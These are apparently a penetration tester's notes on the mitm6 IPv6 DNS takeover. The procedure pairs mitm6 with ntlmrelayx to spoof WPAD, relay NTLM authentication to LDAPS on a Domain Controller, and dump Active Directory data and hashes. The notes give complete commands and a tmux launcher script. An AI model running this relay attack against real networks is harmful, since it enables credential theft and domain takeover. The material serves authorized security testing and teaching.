# mitm6

Repeat clients, and increasingly new ones, have caught on to NBNS/LLMNR spoofing and disable both protocols. When that happens, try mitm6. It acts as a rogue DHCPv6 server on the client network: Windows hosts send DHCPv6 solicits by default, mitm6 answers them, hands out IPv6 addresses to every host on the local subnet and sets itself as their DNS server, which Windows prefers over the IPv4 one. From there it spoofs DNS replies for the names we care about (WPAD in particular), much like Responder, so that the resulting authentication requests can be relayed with ntlmrelayx to targets of our choosing, typically SMB or LDAP/LDAPS.

You'll want two panes in the same terminal window (tmux or a split terminal) to run this effectively.

In the first pane, run mitm6 (it needs root for raw sockets):

```plaintext
cd /opt
git clone https://github.com/dirkjanm/mitm6.git
cd mitm6
sudo python3 setup.py install
sudo mitm6 -d <client domain> -i <interface>
```

In the second pane, run ntlmrelayx:

```plaintext
python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -6 -t ldaps://<Domain Controller IPv4 Address> -wh fakewpad.<client domain> -l loot -of hashes
```

* -6 = Listen on IPv6 as well as IPv4, so the relay catches connections from clients that mitm6 has pointed at the attacker's IPv6 address.
* -t = Target. In the above example, we are relaying authentication requests to LDAPS on the Domain Controller. Relaying to LDAP(S) only works from HTTP-sourced authentication (an SMB client's NTLM negotiates signing, which the DC then enforces), which is why the WPAD trick below matters.
* -wh = Hostname of the fake WPAD server. It must be a name inside the client's domain: clients resolve it through mitm6, which answers with the attacker's address, and then authenticate to ntlmrelayx's HTTP listener to fetch the proxy config.
* -l = Loot directory. With an LDAP(S) target, ntlmrelayx dumps users, groups, computers, descriptions/comments, etc. from Active Directory there.
* -of = Base name of the output files for the captured NTLM hashes.


The following video by TheCyberMentor is a good reference to get started → [**Domain Admin via IPv6 DNS Takeover**](https://www.youtube.com/watch?v=zzbIuslB58c)

**Note:** If either the Domain Controller or the user account being relayed lives in a different subdomain, ntlmrelayx prints a SUCCEED message but does nothing except throw an index-out-of-range error (screenshot below). To fix this, run the same ntlmrelayx command but give the DC's FQDN instead of its IPv4 address (e.g. `ldaps://corp.exampledomain.com` instead of `ldaps://192.168.0.1`). More information is in this GitHub issue → <https://github.com/dirkjanm/PrivExchange/issues/7>
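As an added example (not from the original notes, nor from the mitm6 or impacket projects), the two-pane procedure above wrapped into one tmux session, with the note's FQDN caveat encoded as a check: a bare IPv4 relay target is refused and the FQDN form is required. The domain `corp.example.local`, the DC `dc01.corp.example.local` and the interface `eth0` are hypothetical; it assumes tmux, mitm6 and ntlmrelayx.py (at the Kali path) are installed and that it is run as root.

```sh
#!/bin/sh
# Added example, not part of the original notes nor of mitm6/impacket.
# Wraps the two-pane mitm6 + ntlmrelayx procedure into one tmux session.
# Hypothetical values: domain corp.example.local, DC dc01.corp.example.local,
# interface eth0. Assumes tmux, mitm6 and ntlmrelayx.py are installed, root.
set -eu

NTLMRELAYX=${NTLMRELAYX:-/usr/share/doc/python3-impacket/examples/ntlmrelayx.py}

# Build the ldaps:// relay target. A bare IPv4 address is refused: relays that
# cross a subdomain boundary report SUCCEED and then fail with an
# index-out-of-range error unless the DC is given by FQDN.
build_relay_target() {
    dc=$1
    case "$dc" in
        *[!0-9.]*) printf 'ldaps://%s' "$dc" ;;
        *) printf 'refusing bare IPv4 target %s: use the DC FQDN\n' "$dc" >&2; return 1 ;;
    esac
}

# The fake WPAD hostname must sit inside the client domain: victims resolve it
# through mitm6 (now their IPv6 DNS server), which points them at us.
build_wpad_host() {
    printf 'fakewpad.%s' "$1"
}

# First pane: mitm6 bound to the chosen interface, answering DHCPv6 for the domain.
build_mitm6_cmd() {
    domain=$1; iface=$2
    printf 'mitm6 -d %s -i %s' "$domain" "$iface"
}

# Second pane: ntlmrelayx listening on IPv6 too (-6), relaying to LDAPS on the
# DC, serving the fake WPAD, dumping AD into loot/ and hashes into hashes*.
build_ntlmrelayx_cmd() {
    domain=$1; dc_fqdn=$2
    target=$(build_relay_target "$dc_fqdn")
    printf 'python3 %s -6 -t %s -wh %s -l loot -of hashes' \
        "$NTLMRELAYX" "$target" "$(build_wpad_host "$domain")"
}

# Start both tools side by side in one tmux window and attach to it.
launch() {
    domain=$1; dc_fqdn=$2; iface=$3
    tmux new-session -d -s mitm6relay -n relay "$(build_mitm6_cmd "$domain" "$iface")"
    tmux split-window -h -t mitm6relay:relay "$(build_ntlmrelayx_cmd "$domain" "$dc_fqdn")"
    tmux attach -t mitm6relay
}

# usage: sudo sh relay.sh run corp.example.local dc01.corp.example.local eth0
if [ "${1:-}" = "run" ]; then
    launch "$2" "$3" "$4"
fi
```

The only logic beyond assembling the two command lines is the target check: anything that is purely digits and dots is treated as an IPv4 address and rejected, so the cross-subdomain failure from the note cannot be hit by accident.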

